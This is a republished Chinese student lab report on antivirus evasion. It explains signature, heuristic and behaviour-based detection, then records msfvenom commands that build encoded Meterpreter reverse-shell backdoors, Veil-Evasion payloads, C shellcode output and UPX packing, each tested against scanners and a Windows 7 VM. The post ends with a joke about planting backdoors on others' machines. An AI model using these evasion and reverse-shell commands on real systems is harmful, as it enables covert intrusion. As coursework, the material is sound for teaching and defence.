2017-2018-2 20155230《网络对抗技术》实验3:免杀原理与实践

最新推荐文章于 2024-11-05 15:28:12 发布
最新推荐文章于 2024-11-05 15:28:12 发布
阅读量174 收藏
点赞数
文章标签: python 运维 shell
原文链接:http://www.cnblogs.com/J1n233/p/8761789.html
版权

基础问题回答

1、杀软是如何检测出恶意代码的?

  • 杀软检测恶意代码主要有三种方式:

①特征码的检测:杀毒软件的病毒库记录了一些恶意软件的特征码,这些特征码由一个不大于64字节的字符串组成,且是只有该病毒内才出现的字符串,根据已检测出或网络上公布的病毒,对其提取特征码,记录在病毒库中,检测到程序时将程序与特征码比对即可判断是否是恶意代码。

②启发式恶意软件的检测:将一个软件与恶意软件的行为、代码等作比对,如果发现相似度达到一定程度,即判定这个程序为恶意代码,有一定误报可能。“When I see a bird that walks like a duck and swims like a duck and quacks like a duck, I call that bird a duck.”

③基于行为的恶意软件检测:对运行的所有进程进行实时监控,如果有敏感行为会被认为是恶意程序,是一种动态的监测与捕捉;

2、免杀是做什么?

  • 免杀就是通过一些欺骗性的手段让自己写的后门在杀软眼皮底下为所欲为!

例如改变特征码、给exe加壳防调试

3、免杀的基本方法有哪些?

  • 改变特征码
    • 如果你手里只有EXE
      • 加壳:压缩壳 加密壳
    • 有shellcode(像Meterpreter)
      • 用encode进行编码
      • 基于payload重新编译生成可执行文件
    • 有源代码
      • 用其他语言进行重写再编译(veil-evasion)
  • 改变行为
    • 通讯方式
      • 尽量使用反弹式连接
      • 使用隧道技术
      • 加密通讯数据
    • 操作模式
      • 基于内存操作
      • 减少对系统的修改
      • 加入混淆作用的正常功能代码
  • 非常规方法
    • 使用一个有漏洞的应用当成后门,编写攻击代码集成到如MSF中。
    • 使用社工类攻击,诱骗目标关闭AV软件。
    • 纯手工打造一个恶意软件

离实战还缺些什么技术或步骤?

  • 1、如何神不知鬼不觉的将后门植入其他电脑
  • 2、以目前所学的反弹式连接后门,如果植入后被发现了怎么跑路(所以还是玩玩就算了吧。)

实践过程记录

1.使用msf编码器生成后门程序及检测

  • 首先对实验2:后门原理与实践生成的简单后门进行扫描,放到Virscan上扫描一下
    1071497-20180409201042087-278068035.png
  • 嗨呀,想要暗搓搓的宣传一下自己居然被发现了!那就改个文件名继续试试吧。。。
    1071497-20180410190939291-348427897.png

  • 居然才一半一半,不太应该啊!(本来以为会惨不忍睹。。)

  • msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.222.129 LPORT=5230 -f exe > backdoor.exe用该指令进行10次编码
    1071497-20180410192432988-1202529871.png
  • 现在继续去测试一下!
    1071497-20180410192826930-87352318.png

  • 虽然稍微有所好转!但是本质上来说没有什么区别!果然MSF的编码还是人家玩剩下的。。

2.使用veil-evasion生成后门程序及检测

  • 第一次使用命令sudo apt-get install veil安装veil失败,根据提示用命令apt-get update更新了一下kali源成功安装!

  • 在安装完成后并下载完成veil-evasion后出现老师在群内所说的module 'Tools.Ordnance' has no attribute 'Tool'错误,在将报错的最后一个文件名的那一行注释掉后成功运行!
    1071497-20180410225751961-1262287185.png
  • 使用use evasion命令进入veil-evasion
    1071497-20180410230551757-1491105251.png
  • 输入use c/meterpreter/rev_tcp.py,然后设置回连IP和端口,生成后门文件
    1071497-20180410231538536-114120029.png
  • 送去扫描一哈!
    1071497-20180410232254069-466822075.png

  • 可以看见免杀效果已经是比较优秀了!那就开始尝试一下实际应用把!

  • 使用ncat将木马传入win7虚拟机
    1071497-20180410234307233-2100737693.png

  • 可以看见刚传进来就被qq管家查杀了,可以说是真的很严格了。。。
    1071497-20180410234225475-1360401098.png

  • 因为恢复的时候没将程序加入信任区,所以一运行再次被杀。恢复后回连成功!
    1071497-20180410234855549-619338220.png

3.注入Shellcode并执行

  • 使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.222.129 LPORT=5230 -f c生成一个C语言的shell code
    1071497-20180411082728807-1790904184.png

  • 提取其中的shell code写成C文件并放在codeblock上编译
    (这里不让贴代码就删了!)

  • 开始尝试回连!
    1071497-20180411083110267-1910018445.png
  • 刚要运行就被查杀,看来还是不够。恢复文件后回连成功!
    1071497-20180411083208044-18136057.png
  • 放去扫描一下看看什么情况
    1071497-20180411083652717-1893753563.png

  • 可以看见免杀能力与veil-evasion生成的后门没有什么区别

  • 尝试一下用UPX对.exe文件进行加壳
    1071497-20180411090509096-652936406.png

  • 文件传入win7后,电脑管家没有报毒!且在进行指定位置杀毒后可以看见testshellcode_2文件是不在信任区的!
    1071497-20180411091035047-1184612652.png

  • 将testshellcode从信任区删除后也仅仅只报毒testshellcode!
    1071497-20180411091206131-463557768.png

  • 将文件送去扫描
    1071497-20180411091528217-123511649.png

  • 可以看见虽然逃过了现在市面上用户使用量更多的qq管家的查杀,但是免杀率还是不容乐观!

  • 看了学长的微博了解将shellcode异或、逆序、或者同时使用能拥有更高的免杀率,但是时间关系这个拓展只能先放着了!

实践总结与体会

  • 在做了第二次实验之后,第三次实验似乎并没有什么技术难度,只是使用工具半手工打造自己的后门程序(不得不说veil的安装能熬死一片赶时间的人。。。),还是开头说的,怎么让自己写的后门进入目标主机内是个难题。期间有在veil-evasion尝试过使用python编写后门,但是失败了,具体原因尚不知道。。。
  • 现在可以悄咪咪的自己写个后门放老司机电脑里为所欲为了!

转载于:https://www.cnblogs.com/J1n233/p/8761789.html

aohuang6078
关注
Python机器学习实战:生成对抗网络(GAN)的原理与应用
AI天才研究院
06-29 771
Python机器学习实战:生成对抗网络(GAN)的原理与应用 作者:禅与计算机程序设计艺术 / Zen and the Art of Computer Programming 关键词:生成对抗网络(GAN), 无监督学习, 图像生成, 自动化创作, 深度学习
网络安全-木马隐藏技术-实验分析-教学与研究-木马隐藏技术深度解析与实验分析:核心技术剖析与VMware网络模式指南.zip
05-30
本资源深入探讨了木马隐藏技术的核心原理实验操作,提供了详细的技术剖析以及使用VMware进行网络模拟的指南。这份资料旨在为网络安全专业人员和研究者提供实用的知识和技能,帮助他们理解并对抗恶意软件的隐藏技术...
网络对抗技术 实验
weixin_30237719的博客
11-04 142
中 国人民公安大学 Chinese people’public security university 网络对抗技术 实验报告 实验三 密码破解技术 学生姓名 刘佳杰 年级 2015级 区队 网安二区 ...
网络对抗技术实验3
weixin_30448603的博客
10-24 142
网络对抗技术 实验报告 实验三 密码破解技术 学生姓名 王子元 学号 201521430026 区队 三 指导教师 高见 信息技术网络安全学院 2018年10...
2017-2018-2 20155314《网络对抗技术》Exp3 免杀原理实践
axhc_chentao1981的博客
04-11 594
2017-2018-2 20155314《网络对抗技术》Exp3 免杀原理实践 目录 实验要求 实验环境 预备知识 实验步骤 1 免杀效果实测 1.1 恶意代码生成工具 1.2 免杀效果的评价 1.2.1 VirusTotal、Virscan 1.2.2 免杀效果参考基准 1.3 Msfvenom 1.4 Veil-Evasion 1.5 C语言调用Shellcode,Li...
2017-2018-2 20155314《网络对抗技术》Exp2 后门原理实践
axhc_chentao1981的博客
03-27 1244
2017-2018-2 20155314《网络对抗技术》Exp2 后门原理实践 目录 实验要求 实验内容 实验环境 预备知识 1.后门概念 2.常用后门工具 实验步骤 1 用nc或netcat获取远程主机的Shell 1.1 Windows获得Linux Shell 1.2 Linux获得Win Shell 1.3 Mac获取Win shell 1.4 Win获取Mac S...
2018-2019-2 网络对抗技术 20165231 Exp3 免杀原理实践
weixin_33825683的博客
03-29 1399
实践内容(3.5分) 1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcode编程(1分) 1.2 通过组合应用各种技术实现恶意代码免杀(0.5分) (如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。) 1.3 用另一电脑实测,在杀软开...
2017-2018-2 20155314《网络对抗技术》Exp4 恶意代码分析
axhc_chentao1981的博客
04-18 899
2017-2018-2 20155314《网络对抗技术》Exp4 恶意代码分析 目录 实验要求 实验内容 实验环境 基础问题回答 预备知识 实验步骤 1 静态分析 1.1 使用virscan进行特征库比对 1.2 使用PEiD进行外壳检测 1.3 使用PE explorer查看PE文件头中包含代码信息 1.4 使用Dependency Walker查看其依赖性、导入与导模块 ...
网络对抗原理实验2-SQL注入实验
Nwoods的博客
07-23 640
由于我们使用的不是ip地址而是sock,将使用socket协议运行,我们直接在浏览器打开localhost/index.php即可。以第四个接口为例,记得添加 --proxy "http://127.0.0.8:8082"(我的设置),否则ZAP无法捕获。之后的sqlmap扫描我们结合抓包工具分析,然而这里遇到了一个问题,就是它会自动跳过扫描,直接给第一次分析的漏洞。使用sqlmap的时候需要注意URL需要使用双引号括起来,否则实际执行会丢失参数,后经网络查询,多参数需要使用引号。
人工智能基础部分20-生成对抗网络(GAN)的原理与简单应用
weixin_42878111的博客
05-28 3282
大家好,我是微学AI,今天给大家介绍一下人工智能基础部分20-生成对抗网络(GAN)的实现应用。生成对抗网络是一种由深度学习模型构成的神经网络系统,由一个生成器和一个判别器相互博弈来提升模型的能力。本文将从以下几个方面进行阐述:生成对抗网络的概念、GAN的原理、GAN的实验设计。
免杀原理实践
cyuyan3hao的博客
04-08 1172
网络对抗技术实验
西南科技大学网络攻防与对抗实验三,ARP欺骗实验
06-02
**实验报告:ARP欺骗** ...以上就是关于"西南科技大学网络攻防与对抗实验三,ARP欺骗实验"的详细报告,涵盖了实验目的、环境、步骤、分析和总结,展示了ARP欺骗的实施过程及其在网络攻防中的作用。
雷达原理对抗技术\雷达原理对抗技术实验指导书
11-22
《雷达原理对抗技术实验指导书主要涵盖了与雷达系统设计和对抗策略相关的实验内容,旨在让学生通过实践操作深入理解雷达工作原理技术对抗的基本方法。实验涵盖了多个关键领域,包括FPGA(Field-Programmable ...
自助餐剩余食品识别图像分割系统:教学内容全覆盖
sgcsdn99的博客
11-04 1428
数据集信息展示在本研究中,我们使用的数据集名为“9_5_Merged”,该数据集专门用于训练改进YOLOv8-seg的自助餐剩余食品识别图像分割系统。该数据集包含71个类别,涵盖了丰富多样的食品种类,旨在提高模型对不同类型剩余食品的识别和分割能力。通过对这些类别的细致划分,我们希望能够实现更高精度的图像分割,进而优化自助餐剩余食品的管理和利用。
【anaconda】使用记录
最新发布
zhuyan108的博客
11-05 319
window11 下安装anaconda。
Python 类和对象
疯一样的码农
11-04 734
Python 中,类是一个对象创建的蓝图。它指定了对象(实例)将具有的属性和方法的集合。类通过封装数据和行为,促进了代码的组织、复用和模块化。使用类可以建模现实世界中的对象,定义其属性,并更有效地控制应用程序的复杂性。在 Python 中,一切都是对象,所有的数据类型和结构都是特定类的实例。对象是类的实例,具有用于修改数据的方法和存储数据的属性。理解对象对于掌握 Python 中的面向对象编程(OOP)范式至关重要。
探索 Python 的新天地:Helium 库揭秘
AIGC搞起
11-04 805
在自动化测试和网页交互的领域,Selenium 是一个强大的工具,但它的复杂性和陡峭的学习曲线让许多开发者望而却步。Helium库的现,以其简洁的 API 和易用性,为 Python 开发者提供了一个新的选择。它不仅简化了 Selenium 的使用,还自带 WebDriver,减少了配置的复杂性。Helium 以其简洁的 API 和易用性,为 Python 开发者提供了一个强大的 Selenium 替代方案。它不仅减少了代码量,还简化了 WebDriver 的管理,使得自动化测试和网页交互变得更加容易。
01_IAR新建CC2530工程
nanxl1的博客
11-02 1048
由于很多Zigbee商家提供的教程未有从零建立CC2530工程的讲解,可能会导致后面的开发中现一些琐碎的问题。本文将以**LED流水灯**为例,从0到1用**IAR**建立CC2530工程。
Python小游戏21——拼图小游戏
cxh666888_的博客
11-05 1016
如果图像大小不同,你需要调整tile_size和图像缩放代码。初始化Pygame:使用pygame.init()来初始化Pygame库,这是使用Pygame进行任何游戏开发的第一步。更新屏幕:使用pygame.display.flip()或pygame.display.update()来更新屏幕显示。调整图像大小:使用pygame.transform.scale()来调整图像的大小,以适应拼图游戏的需求。设置屏幕尺寸:使用pygame.display.set_mode()来设置游戏的屏幕尺寸和模式。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值